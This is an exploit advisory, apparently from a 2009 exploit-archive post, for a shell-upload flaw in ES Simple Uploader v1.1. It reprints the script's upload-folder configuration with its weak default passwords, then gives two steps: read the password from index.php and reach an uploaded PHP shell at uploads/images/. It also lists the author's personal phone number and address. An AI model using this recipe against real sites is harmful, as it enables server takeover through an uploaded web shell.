1 ========================================================================================
2 | # Title : ES Simple Uploader v 1.1 Upload Shell Vulnerability |
3 | # Author : indoushka |
4 | # email : indoushka@hotmail.com |
5 | # Home : Souk Naamane − 04325 − Oum El Bouaghi − Algeria −(00213771818860) |
6 | # Web Site : www.iq−ty.com |
7 | # Script : ES Simple Uploader v 1.1 (Powered by EnergyScripts) !talian Script |
8 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
9 | # Bug : Upload Shell |
10 ====================== Exploit By indoushka =================================
11 | # Exploit :
12 |
13 | $upload_dirs = array(
14 | "images" => array(
15 | "dir" =>"uploads/images/",
16 | "name" =>"Images folder",
17 | "password"=>"images",
18 | ),
19 | "docs" => array(
20 | "dir" =>"uploads/docs/",
21 | "name" =>"Docs",
22 | "password"=>"docs",
23 | ),
24 | "common" => array(
25 | "dir" =>"uploads/common/",
26 | "name" =>"Common files",
27 | "password"=>"common",
28 | ),
29 | );
30 |
31 | 1− http://server/script/index.php * loockup 4 password
32 |
33 | 2− http://server/script/uploads/images/Ev!l.php * 2find it
34 |
35 ================================ Dz−Ghost Team ========================================
36 Greetz : all my friend * Dos−Dz * Snakespc * His0k4 * Hussin−X * Str0ke * Saoucha * Star08 |
37 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
Page 1/1
ES Simple Uploader v 1.1 Upload Shell Vulnerability
indoushka
12/26/2009